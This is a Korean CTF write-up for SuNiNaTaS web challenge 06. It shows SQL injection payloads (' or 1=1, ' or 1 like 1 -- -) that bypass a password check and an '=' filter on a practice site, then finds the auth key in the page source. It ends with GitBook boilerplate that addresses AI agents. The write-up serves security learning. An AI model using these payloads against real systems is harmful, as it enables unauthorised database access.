> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/suninatas/suninatas-game-06.md).

# \[SuNiNaTaS] Game 06

문제 출처 : <http://suninatas.com/challenge/web06/web06.asp>

***

<figure><img src="https://blog.kakaocdn.net/dna/di2jWA/dJMcafyegLG/AAAAAAAAAAAAAAAAAAAAAFWCiqwSZ4rUqTP-OV6TT0vc9Br4kVJ8kPb92ke_GpzP/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=lFdxvBobE5eL%2BjUubRp8oc9LQwA%3D" alt="" height="600" width="1482"><figcaption></figcaption></figure>

처음에 접속하면 게시판이 뜬다. 힌트부터 들어가준다.&#x20;

<figure><img src="https://blog.kakaocdn.net/dna/dYZm7b/dJMcabJmNxf/AAAAAAAAAAAAAAAAAAAAAAOUxWC5FUZJBgSggDXwOj9qVFTm5zOR_-LYYn6ZNeO3/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=7u8JlFHf1%2BYCukI5ulFfIvZuEeo%3D" alt="" height="677" width="1120"><figcaption></figcaption></figure>

suninatas가 작성한 글을 보라고 한다. \[Back]을 눌러 게시판으로 돌아가주자.

<figure><img src="https://blog.kakaocdn.net/dna/cJvJWc/dJMcaaDGz0u/AAAAAAAAAAAAAAAAAAAAAGKI6Y8S6DcJS7O3QL_9_RlWdDWotnCdsnOoMIgNyWxZ/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=ei5rjztxL0Ouq%2BxQ9a%2FU1OezcnQ%3D" alt="" height="396" width="1052"><figcaption></figcaption></figure>

suninatas가 작성해준 README를 누른다.

<figure><img src="https://blog.kakaocdn.net/dna/dUfZ7j/dJMcabWTK0p/AAAAAAAAAAAAAAAAAAAAAP1eHgSWGtbMkju8snHVxykMDgRW2dmcvxv7TOU8jEIV/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=4ifJlPpoMGznz9poLLJqPAFxW5k%3D" alt="" height="287" width="348"><figcaption></figcaption></figure>

누가봐도 SQL Injection인 팝업창이 뜬다. 해당 SQL문은 T\_Web13라는 테이블에서 szPwd 열만 추출한다. 추출할 값은 인덱스가 3이고 szPwd가 '"\&pwd&"'인 값이어야한다는 의미이다.\
Password를 프롬프트에 입력하면 "\&pwd&"에 들어가게 될 것이다.\
가령 프롬프트에 ' or 1=1 을 입력하면

```
 "select szPwd from T_Web13 where
  nIdx = '3' and szPwd = ' or 1=1'"
```

위와 같이 쿼리가 값을 처리하게 된다. \
넣어보면 알겠지만 =도 필터링을 하고 있다.

<figure><img src="https://blog.kakaocdn.net/dna/bDqkFv/dJMcahbJ951/AAAAAAAAAAAAAAAAAAAAACvxWmmkklZhnhyz5_O6DkfK7QBcuYbCtcQTStVDbICg/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=6eceI%2FJQHKbUcgZYAfn09%2FFSQdM%3D" alt="" height="286" width="356"><figcaption></figcaption></figure>

이를 우회하기 위해 like를 사용해주면 된다.\
프롬프트에 ' or 1 like 1 -- -을 넣어주면&#x20;

```
select szPwd from T_Web13 
where nIdx = '3' and szPwd = ' or 1 like 1 -- -' # WHERE nIdx = '3' AND (szPwd = '' OR TRUE)
```

위와 같이 쿼리가 작동한다. \
마지막 -- - 주석처리(SQL은 -- 뒤에 공백이 있어야 주석처리가 인정되며 --+도 먹힌다.)로 인해 and 비교문 자체를 무효화 하고 인덱스 값만 남기게 된다.\
그래서 테이블에 인덱스 3인 데이터만 남기게 된다.&#x20;

<figure><img src="https://blog.kakaocdn.net/dna/bngPdN/dJMcaiuUiBJ/AAAAAAAAAAAAAAAAAAAAAKCyomZzrv_jIb_v5aX5e52ihgTo_ojQzNdxt8k6YgAa/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=QYvJHHgbd7doNrNO8Zou%2FSHn2Y4%3D" alt="" height="310" width="600"><figcaption></figcaption></figure>

참고로 저 auth\_key 정답 아니다(ㅋㅋ;;;;;;;;;)\
&#x20;

<figure><img src="https://blog.kakaocdn.net/dna/ETJbD/dJMcahW7lTr/AAAAAAAAAAAAAAAAAAAAANIZnE1dtXdc8-Y_0lJI1_Z8aZAg667fcV6tN6Bp2nlW/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=gY3Z12ennd8j7Cp8osGgKRXmzUk%3D" alt="" height="642" width="1021"><figcaption></figcaption></figure>

화면상 아무것도 안 보이니까 \[F12]를 눌러준다.

<figure><img src="https://blog.kakaocdn.net/dna/cvsDZf/dJMcacaq0kl/AAAAAAAAAAAAAAAAAAAAAPOxJ0G0PhTa3EMBVKY924EXzQqCZYJu_ruwFQ5qegF7/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=uC4GCFKaT8gxALeY5oi1D7Z4OJc%3D" alt="" height="291" width="618"><figcaption></figcaption></figure>

로마의 첫번째 황제는 아우구스투스 카이사르다.\
따라서 Authkey는 Augutus이다.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/suninatas/suninatas-game-06.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.